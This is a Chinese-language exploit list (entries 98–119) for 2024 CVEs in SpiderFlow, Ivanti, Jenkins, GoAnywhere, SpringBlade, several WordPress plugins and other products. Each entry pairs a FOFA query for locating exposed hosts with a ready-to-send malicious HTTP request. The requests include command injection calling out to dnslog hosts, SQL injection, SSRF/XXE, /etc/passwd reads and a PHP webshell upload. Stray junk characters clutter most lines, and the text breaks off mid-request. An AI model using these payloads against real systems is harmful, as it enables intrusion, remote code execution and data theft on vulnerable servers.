98. SpiderFlow爬虫平台远程命令执行
% `" C+ ^$ A. M5 FCVE-2024-0195
+ A+ x# E& Y5 E. `, Y1 f+ q) ^) D0 RFOFA:app="SpiderFlow"  s- I. `; s# d
POST /function/save HTTP/1.1
0 i8 f# l, M( Y. l3 d  MHost: 192.168.40.130:8088
6 V! A. S8 w- c, f" N# N- QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0& r# z4 a+ E3 |% F' B
Connection: close8 k. l( B, M1 W) ~) y! K1 l, W0 J
Content-Length: 1215 |  M  E+ V( {* D
Accept: */*
6 [" W  }% O& |# ]Accept-Encoding: gzip, deflate
  t' c/ S3 c1 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: o1 }9 x+ m+ ~: n1 W7 I+ T* EContent-Type: application/x-www-form-urlencoded; charset=UTF-8
$ Q9 O: E2 z8 H: a# TX-Requested-With: XMLHttpRequest- P9 q4 Q  c. i2 L2 n

4 A; _. J" b  R8 L* T0 {% Xid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B# |( b; I% t* Z/ h) e! C% \

7 X4 s! s1 R; l2 E. o& f( g& v% r$ J& f% p4 {
99. Ncast盈可视高清智能录播系统busiFacade RCE
' H& U+ ]# @/ u" xCVE-2024-0305
1 c  v( q% Y& d6 tFOFA:app="Ncast-产品" && title=="高清智能录播系统"
7 F3 |5 q/ F3 iPOST /classes/common/busiFacade.php HTTP/1.1
* K5 P: [; r! H( c' d6 ^Host: 192.168.40.130:8080! x8 M+ M, \. d6 i, H+ \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
$ ]+ V9 l& O& T. T2 O. U, s4 \Connection: close7 g" `& H; I: B4 _# D
Content-Length: 1540 r( q9 I% y% Y; T, ~$ V" p% h6 I
Accept: */*
% x9 l# P" F+ v. W" N* F$ I6 JAccept-Encoding: gzip, deflate
! S9 P6 j/ L3 K3 C' \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 \. j1 B9 F9 w2 _: c4 Y% ~1 y
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
' n: k9 Y  o; v0 ?6 u3 sX-Requested-With: XMLHttpRequest
: b; M3 Y& T& V8 @* V* R! f; n
7 ~8 o' ^6 p% c4 X& X! Q%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
% G$ g3 W  a* j1 E2 k3 Y0 c
0 {  j8 b; h. \. C. h( b) K8 s# J/ L6 [6 X; h- @( e+ S
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
& i( ^8 O' I+ HCVE-2024-03524 N$ h6 ?" Z) M
FOFA:icon_hash="874152924"
/ L/ J3 K6 |" |8 j3 ~. `2 P+ jPOST /api/file/formimage HTTP/1.1
5 B" I0 f) z, L. {- N6 Y7 NHost: 192.168.40.130
3 v) b2 k+ l2 A6 o. ?User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.366 j1 g, @' g! [' l
Connection: close
' V2 e7 _' O, a* a& Z3 xContent-Length: 201, z' g2 r, d% [- N) S6 e
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei7 f  K! k* O, R4 x0 [' P
Accept-Encoding: gzip" Y% }3 I0 V5 L0 G/ r* m, ~
" \8 n& s  t  V& c2 a
------WebKitFormBoundarygcflwtei
7 r/ w6 S3 \/ t* Q. |4 KContent-Disposition: form-data; name="file";filename="IE4MGP.php"5 u+ N9 Q: g6 `$ C% x! p: ~
Content-Type: application/x-php3 J8 p" r! ~9 u

. i# a" g" `. ]. ?' P/ R2ayyhRXiAsKXL8olvF5s4qqyI2O( z, B" k4 h8 I* U- C' _) W+ z5 d
------WebKitFormBoundarygcflwtei--1 M+ b4 @7 O8 y' G
0 b# f3 j, D1 a  @

- d6 |: H* n/ B4 m2 H101. ivanti policy secure-22.6命令注入
, d: r0 _. O9 ^CVE-2024-21887
0 V9 w# t* l* C& N# s$ u" K* ?4 \FOFA:body="welcome.cgi?p=logo"
8 n5 G2 L9 [7 f" g1 YGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.18 f, A) W4 b2 F9 T7 d
Host: x.x.x.xx.x.x.x6 J2 n- Y7 T8 E$ q# {
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# U5 I8 w, G. t0 J2 l& |3 t) i
Connection: close
4 I8 W! n8 x  Q: P) ^3 ?Accept-Encoding: gzip
; Z, Z. v5 |. T" c+ q! A5 p. X7 }3 Q. j/ r; o% j9 v

$ t8 f: ^1 q( u3 Y102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
/ f1 K4 u) C; Q$ XCVE-2024-21893+ X- n3 W/ R: `9 ^  j2 B
FOFA:body="welcome.cgi?p=logo"
; C% B: y8 @' B+ E# ZPOST /dana-ws/saml20.ws HTTP/1.1
1 ~1 O, T+ }2 O& K0 ]& G5 g8 C3 K2 gHost: x.x.x.x
2 j& O# R6 y% V$ lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
* t- M- I+ q) d& b7 w) v- Q/ pConnection: close5 O3 @3 F( D4 d- h
Content-Length: 792
4 m! A& v/ G. L* HAccept-Encoding: gzip
' ^6 @9 X4 G( P5 j
4 r: B. u' Z4 n" ^3 ~5 w<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>1 d" W* F; ?0 i9 l
* k# y% {$ I- w3 P$ o/ x6 U
103. Ivanti Pulse Connect Secure VPN XXE4 a3 R- Z' T9 F( a; e3 Z
CVE-2024-22024/ d7 o2 X+ s* f/ x$ q, T( Z7 v
FOFA:body="welcome.cgi?p=logo"; i# t2 F8 H& S  |( S
POST /dana-na/auth/saml-sso.cgi HTTP/1.10 x% ^! V7 x- w- t! C% ?; V6 N6 \
Host: 192.168.40.130:111
3 U( }* E" I- g( UUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
% @- j8 ^' A; o% u5 eConnection: close6 ~9 n* e  a& l4 Z& b- b
Content-Length: 204
/ r3 k; w) w& L/ dContent-Type: application/x-www-form-urlencoded* @) w5 x* L7 M5 [& M
Accept-Encoding: gzip
" S3 T4 ]8 {0 j9 @3 h8 z
3 @) }4 c7 S. H+ G* l( C2 jSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==0 h1 m; J# n/ H/ W- Y, w

2 P# o# I( b7 ~, O4 y  F: i1 {6 p$ T6 D' y1 k2 Y$ x( N
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下4 h3 {' V6 s+ l- R9 F
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
/ c$ y( ~# e7 O, J- i
) N9 S4 i; k0 i# y; y
% q8 A! i4 S3 l; I. _/ Z0 Q# p3 F: ^104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露$ B4 _3 r" O- ?0 V
CVE-2024-0569/ \& w% V- A! ]
FOFA:title="TOTOLINK"; n* ~" E! Q- {$ C7 r' s0 T
POST /cgi-bin/cstecgi.cgi HTTP/1.1
' R1 [, B" G3 _2 r, l. ]! rHost:192.168.0.1
7 }0 r$ ]! [& G& `! j5 LContent-Length:411 U2 C7 w5 M: i. }
Accept:application/json,text/javascript,*/*;q=0.01
7 G. q3 \  B8 B7 B9 y' TX-Requested-with: XMLHttpRequest
8 U8 v1 Z$ |3 n" WUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
. m: g( c4 n6 w2 E7 S/ R9 mContent-Type: application/x-www-form-urlencoded:charset=UTF-80 k# M0 h/ z# ?/ j9 K$ k) k0 s) [
Origin: http://192.168.0.1. O- g; L* m4 p$ h9 {( Y8 D
Referer: http://192.168.0.1/advance/index.html?time=1671152380564- v4 s# Q2 H. ]/ v; f
Accept-Encoding:gzip,deflate3 s% h5 u6 W3 }- w8 m
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7( p6 V& H. m0 D, T0 G
Connection:close2 Q' U( g3 b$ O+ g! V
1 f. L' q! S2 L9 h
{8 _" t: U( ~. y) x9 u
"topicurl":"getSysStatusCfg",: o6 I: G6 `' G' l5 X  }# L7 e
"token":""7 x4 i( M" P/ x- {- \/ p6 C$ _1 x
}
5 D1 x7 R5 t5 j" G# E. _4 w" a- c2 ]8 o9 o# b
105. SpringBlade v3.2.0 export-user SQL 注入0 C# i0 d. J& O% x
FOFA:body="https://bladex.vip"" v8 `1 V3 Y' F: P
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
+ X$ s& w. `. f; p4 c9 N
: X4 f2 v" T* ]/ K, g6 F4 T$ J$ L106. SpringBlade dict-biz/list SQL 注入
2 T/ c( X* K& {$ @FOFA:body="Saber 将不能正常工作"
7 P3 m: {0 z. f0 x3 X! G" l7 HGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1% N# E% `3 Q; w2 |! G+ I; X- q* P
Host: your-ip
0 ~4 S1 ^; Z+ `5 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% d- e8 D( t. f. bBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
# ?7 c+ A  O1 p/ K: B" x: @0 |Accept-Encoding: gzip, deflate9 ?; \. U6 K; R  j1 R
Accept-Language: zh-CN,zh;q=0.9
) X/ S8 b! w4 N5 J7 k; aConnection: close
% T5 f" b* A5 Q3 [# b. U" S# e0 f( N+ b( v4 O

9 w. l  n: d1 s2 c) u107. SpringBlade tenant/list SQL 注入
& p3 y+ Y! g: K6 }$ ]4 ]' J( {, zFOFA:body="https://bladex.vip"' T% w  @( O3 c1 G  u
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1$ J9 _! {6 g9 J- _6 g
Host: your-ip! T+ ?7 F3 r$ G$ y- c' y/ q4 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 M" Q0 s3 z5 [. y7 I/ r
Blade-Auth:替换为自己的
( }3 k* E1 _" C, h' H: [6 jConnection: close3 K( s* o4 ^: ^! \% C& o

  s8 N7 ]" r; O' F2 j3 _& R8 D1 @, d
108. D-Tale 3.9.0 SSRF2 K% e& L# \5 t2 E
CVE-2024-21642
. h" W. ^- |) JFOFA:"dtale/static/images/favicon.png"4 W$ U4 n# x4 V$ J- _0 R5 T+ _5 `# u) ^5 t
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
$ c7 K1 Y8 X1 Q. gHost: your-ip
0 K8 V: Y$ ?$ U5 wAccept: application/json, text/plain, */*
2 L1 h6 ?) R6 u" l4 e; tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 F" K9 f, x1 T9 n5 C0 z9 C/ n# q
Accept-Encoding: gzip, deflate& H- l0 {! B' f
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
9 T& G: v, s% V# o9 k  A! zConnection: close
3 Y7 N9 C- n3 ^$ [' U' f# [4 W
+ B( Y) ^% _9 m' t$ G
5 u% D( e$ e; C5 m( z0 ]0 T9 @109. Jenkins CLI 任意文件读取
! u# p: X4 G0 z0 j: v+ zCVE-2024-238970 C9 w( X  p/ U. r) D
FOFA:header="X-Jenkins"
: P6 c8 Z) Y! V: W8 ~/ }9 z9 i( H3 IPOST /cli?remoting=false HTTP/1.15 F5 L2 j% J$ t4 |4 y9 C
Host:
, P  \* \& n2 `0 vContent-type: application/octet-stream- X5 e& L, m% O7 ~, u: Q  w
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92& k2 f$ Q' z# E4 ^" {
Side: upload
# M) I  W0 h& ~; i# Z% qConnection: keep-alive. W- {  d8 g" R0 j" e' u% F
Content-Length: 1635 }! ]0 l3 D* \. q+ S% i
  m- k( }* [, O% \
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'9 Z# b- n% v: w. Q0 y6 g% @( K
$ g8 A; T  j8 b+ e

5 ~! m+ x) z! N9 |9 P. I/ ~POST /cli?remoting=false HTTP/1.1
% P' M, X# c$ P" X+ a" OHost:
) V6 j! y$ n& S/ @Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
6 }" M3 C6 ]. m$ h; `4 B6 x' Z/ u" Qdownload* i, m+ p/ j3 p7 k7 W* l! r! `
Content-Type: application/x-www-form-urlencoded- j0 {6 t& a. M6 O( A9 h
Content-Length: 0) O  A( K0 P3 P5 r  H: S( Q

7 R! T+ [" D" M+ t
. m4 y& e' U* p. NERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin: N& M" V* W3 M: |( m0 o# ~
java -jar jenkins-cli.jar help4 q& v0 I5 }5 J% a9 }8 v' E+ o
[COMMAND]1 V7 \" W, P5 o( N8 d' f0 P" U  ?
Lists all the available commands or a detailed description of single command.
0 z/ H* S3 a. R COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
$ x& b! Q7 M5 _! W4 z! D1 K& B! Y) Q* Q( k3 |

7 n1 O6 ~/ ^- R1 Y$ j110. Goanywhere MFT 未授权创建管理员
# t2 b. L9 n' x( o: CCVE-2024-0204" \2 M9 T6 x- C* R" v3 o8 c0 n
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
: [# g8 X  O: {7 A  p" ]GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
& ?( M- |4 f* z% KHost: 192.168.40.130:8000
9 N, i. e/ D5 |0 qUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.365 M8 q4 A! A2 N% \8 `3 f1 S
Connection: close7 a# [/ p: C) m' I
Accept: */*
3 K/ X9 N& v& lAccept-Language: en
( r6 L& I% g2 O& P3 c+ ~) S0 @Accept-Encoding: gzip
- _9 P' X4 p8 B! a/ y! _3 M5 {

/ g4 V% p( S% Z% l5 D3 w111. WordPress Plugin HTML5 Video Player SQL注入
8 j% J) `1 M  f" lCVE-2024-1061% d, n6 u1 M  l6 j6 }% t+ V
FOFA:"wordpress" && body="html5-video-player": v0 Y+ \9 m& W0 k; }4 o: Q
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
; b9 i( l: f: y* S5 q7 ^" [Host: 192.168.40.130:112( @' T2 R( Z2 w. N# ~& g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.366 u& |5 U, q; Q% h1 X
Connection: close) H% j) a: S& |, P. q4 P4 S" s
Accept: */*, i: Z7 v* b# X6 m, f  O0 Z) S: D, C
Accept-Language: en, e4 n3 G8 d, X; u
Accept-Encoding: gzip% o% c# }& Y% N3 d" @; ?& Q

1 H. L: B: _: u  \2 C: }$ G. D9 \  C5 `0 H
112. WordPress Plugin NotificationX SQL 注入
" X+ R, y4 r7 p5 d5 ~CVE-2024-16987 `! b3 u/ I0 [* n1 ?
FOFA:body="/wp-content/plugins/notificationx"
, Q+ g) P; M& P" ]- m9 sPOST /wp-json/notificationx/v1/analytics HTTP/1.1
8 p5 t6 Q( K5 nHost: {{Hostname}}: m: _4 D8 H5 s: [* _% A
Content-Type: application/json
% f  }$ D+ H$ K0 q4 X9 B/ E
. G; q; l6 @, t  O4 S8 m8 S{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
7 E+ g. z9 B; `& k9 r/ n1 j/ X" Q0 Y6 B+ u! j0 C4 V) v" K
8 b8 s9 c* Q1 A) m) e* e
113. WordPress Automatic 插件任意文件下载和SSRF' n. Q1 M* w$ v' P  M5 J( \: l
CVE-2024-279541 H% {2 F- v" R0 U6 |5 G6 `
FOFA:"/wp-content/plugins/wp-automatic"' Z- Y* m" Y+ G0 `5 i6 X$ h
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.14 D) c7 \. `& S8 _/ y- D# g% l' A2 q
Host: x.x.x.x4 R/ N* t. h; P
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
  p% ?& E2 k+ i  p' ~0 l% v- AConnection: close- n! R+ e8 K/ @& x: W" Q1 d
Accept: */*
. p/ X" V: j; h/ MAccept-Language: en
( b0 A/ ^( z6 U: `$ k& [8 b& ?6 TAccept-Encoding: gzip) \% g- J) n0 x; R
9 ?  j8 O  l3 ~) R  L( U' j
$ I) b7 _& P8 N- ]6 G1 j
114. WordPress MasterStudy LMS插件 SQL注入3 k& P4 `1 f  k7 @  C
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/") m% I0 K7 i1 E$ _+ e+ s
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
% @$ K: {# J) K* R3 \Host: your-ip% y' @% M$ B. f. r$ J
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36. [3 L' Y' k% ]4 G
Accept-Charset: utf-8
2 w. I/ v$ v3 Y" NAccept-Encoding: gzip, deflate
! r7 w$ }$ f  f' lConnection: close2 e0 v# y# @8 A% X+ F
- h0 q  `9 U' S, l3 l7 E

( P. Q& P5 u2 P+ l+ S- b5 S) F( w& Q115. WordPress Bricks Builder <= 1.9.6 RCE
+ w* I( ?7 l6 k8 ]4 t" ZCVE-2024-256007 l$ F9 e2 |1 g+ k8 X
FOFA: body="/wp-content/themes/bricks/"
' k& J6 Z5 M# k, g  Y第一步,获取网站的nonce值  H2 z3 @) u) \+ o# M
GET / HTTP/1.1
$ {( \4 ]& c. e: J9 qHost: x.x.x.x
- Z- e8 j; f( L/ q3 L& w: _User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.360 C+ l; U9 f! j8 k$ D2 f) K
Connection: close/ f) J* h5 e- q( u8 f9 [* L
Accept-Encoding: gzip4 v+ _& Q) Q) j3 m

5 I; B0 E0 q  X' b' E# {
! k% a" ?3 j( a% Y  ?* M' c- }第二步替换nonce值,执行命令
/ i5 O% Q+ Z; U" W+ o' _  W$ |POST /wp-json/bricks/v1/render_element HTTP/1.1
1 `6 V0 g% Y4 W( {Host: x.x.x.x3 @2 y3 f4 x2 P* d( J$ e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36( o( C7 I' H- D& v* }
Connection: close
+ m2 t' {1 d, p4 N  w: K+ D$ lContent-Length: 356! _! C# W" K0 l  o0 q
Content-Type: application/json9 m$ d# J! S  K  Z. `2 z* B
Accept-Encoding: gzip
; A3 Q5 R; @* Q! |8 f: c
5 m3 W( a% n' C+ f{
5 y8 W! w2 P4 U3 ^( a. k2 P5 L  t3 t"postId": "1",
. [" i2 {' k  w# G% o0 r" F  "nonce": "第一步获得的值",
, \) @2 u. J! W  "element": {! c& i+ ^+ ?7 F" ^2 h) j
    "name": "container",
9 C4 ~8 ]& @* H  d( u    "settings": {
0 G. D* N6 X7 ]7 ?3 F, M# o3 v      "hasLoop": "true",
$ r+ a; \, S* @2 {' r9 t* d2 [      "query": {3 _, Z* d+ G+ i) a
        "useQueryEditor": true,
  q1 g* U4 z* X. ^4 k; h        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
- o3 T3 b# S: n, N        "objectType": "post"/ l3 V* U0 Q1 u. D7 d( k
      }
( \- R! d5 W1 A8 e    }
7 @% U% {! V5 u% M3 A2 c  }( y( y$ `7 k) C" u) F
}- X. v7 k5 B8 J

4 V" D3 ~3 K/ [  a# x1 p* M$ R: {9 H* M0 A, }
116. wordpress js-support-ticket文件上传
0 g4 n) n$ u1 H9 L3 y! u( UFOFA:body="wp-content/plugins/js-support-ticket": o; y- N) }3 o, M
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
$ {5 P& C* Y5 H: F8 ]) yHost:
% a' y3 P' {% E6 |# IContent-Type: multipart/form-data; boundary=--------767099171- ~2 J3 B0 {  T+ l2 i" J/ W
User-Agent: Mozilla/5.06 ?' ?7 _$ ], b1 p6 X
- J$ b+ w. O+ l" |; L8 r% r4 r: _
----------767099171
% [  B4 i4 _; x) h5 gContent-Disposition: form-data; name="action"
, b4 R) z* e9 Y3 v! |configuration_saveconfiguration; z. F4 U1 n" d% h+ ^: C( N
----------767099171
! L* e7 X: s3 o: n0 p, T: k9 {Content-Disposition: form-data; name="form_request"% I+ g. L- r6 a/ b
jssupportticket- g8 ]) _* Q$ s% L! p) k
----------7670991710 d. j. D* z( r% m' e
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"& ^7 m) S) z' J1 A
Content-Type: image/png
0 D, s5 D6 d$ r/ a  G% W  U! q----------767099171--! r9 Z3 |" f) R7 R
1 y+ ^! Z0 q6 F1 U8 S# N8 J
) n; e% y; Q# `5 G8 E) s3 l7 c
117. WordPress LayerSlider插件SQL注入+ e+ m7 B5 w1 T& ]. m2 D) Q" T
version:7.9.11 – 7.10.06 j9 ~( I8 O" p  [: L
FOFA:body="/wp-content/plugins/LayerSlider/"( S: _. y" w' P% e# a& S0 N; |
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.10 d% Z7 d$ M  f, {' C4 z
Host: your-ip
- r/ L# W( K% e9 i- T6 c5 t+ L* {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
( g! h" g0 ^0 m9 f& _6 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" u, L0 G! c( nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 u0 i3 u' b% d9 q+ Q
Accept-Encoding: gzip, deflate, br: K; M! T+ }' k% U+ S; O  [  n
Connection: close  ~0 y$ L5 f; L: p# z
Upgrade-Insecure-Requests: 1
- c+ i* S5 e( b- r$ [" H
, ^$ i9 m% m. Q- w/ G8 }5 k- e& ]( n; \4 |2 g* n, ^' K/ l0 G
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
4 _7 l. W7 s) C1 ]CVE-2024-0939
" ?* ]4 w$ j7 Y# {/ h( z. mFOFA:title="Smart管理平台"
5 }+ }( F" {7 C# x1 g' @% DPOST /Tool/uploadfile.php? HTTP/1.1
' ]9 U. P" \: {8 t/ S. G9 tHost: 192.168.40.130:8443" c- w/ @4 p9 U3 S
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
9 L3 }# K- Z1 p$ Y( uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0* {* ~& u' ^4 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 b0 A# E. z: n1 ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# h( @9 u7 _: H% W" S
Accept-Encoding: gzip, deflate
" X2 G8 m0 s" ^; b9 u7 UContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
  x/ z4 Y' A  [" n# D2 |% @Content-Length: 405! @9 H8 S9 M" R; q$ K; f
Origin: https://192.168.40.130:8443
' u* X5 a9 q/ r  q* _Referer: https://192.168.40.130:8443/Tool/uploadfile.php" c( K# `& W% t/ v1 O2 L( d
Upgrade-Insecure-Requests: 1
+ O6 b! n, r5 C! G2 B. z, iSec-Fetch-Dest: document
1 {* c1 O  ]3 v; g. E+ Z0 S( JSec-Fetch-Mode: navigate
+ I2 t) _: Q7 b, m) u8 F$ U/ W. qSec-Fetch-Site: same-origin' E0 G6 A# [) O( G$ R
Sec-Fetch-User: ?1
# N( C5 \$ `: U# B1 H6 xTe: trailers: s! _( J9 `& U. I- f2 Y+ H" p- {% |) Z
Connection: close
, i3 e: b5 o" ^" h9 U: J/ l( L" d% G6 l7 D
-----------------------------13979701222747646634037182887
! g  y, C* W+ _- J9 M8 R6 XContent-Disposition: form-data; name="file_upload"; filename="contents.php"* Y, A+ o; q: l" P) r9 r
Content-Type: application/octet-stream7 U( E+ W; k9 k3 S) E) l# {9 Z) _0 l0 U
! n8 k4 o& G' P% a" v
<?php+ Q: a' H4 O& F5 {1 c# V
system($_POST["passwd"]);  ]8 ?: k3 n) X& \
?>
5 p! K9 d& W( e-----------------------------13979701222747646634037182887: y# q, F' i1 }$ Y/ M! }
Content-Disposition: form-data; name="txt_path"
3 n7 Q9 r( r% F9 r. B) |
; ]5 ]9 @6 s# [/home/src.php
! H4 M! m; t3 u-----------------------------13979701222747646634037182887--
. `# V9 h( b* K, j* k# |: b6 g
$ W2 s- H) C8 i9 R9 J1 }/ M
# u3 \6 g# ^$ w- w# H5 S访问/home/src.php9 M2 j# a0 [1 k5 `& a- Q. @

& ~0 k4 m. ~4 b6 }7 L2 Y% l119. 北京百绰智能S20后台sysmanageajax.php sql注入
# u  K0 K! V# n" M3 [' U* F4 uCVE-2024-1254% I, s+ N: \+ l" I. n+ W& @
FOFA:title="Smart管理平台"
% Q- Z. j; D: E- `先登录进入系统,默认账号密码为admin/admin
0 f, u7 f4 X4 n$ ^1 M/ SPOST /sysmanage/sysmanageajax.php HTTP/1.118 N6 N5 }* @/ ~) Y& y4 N6 C' M8 h
Host: x.x.x.x
! C( Q0 y1 n1 gCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee0 ~/ T$ u9 b% O6 x- I0 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
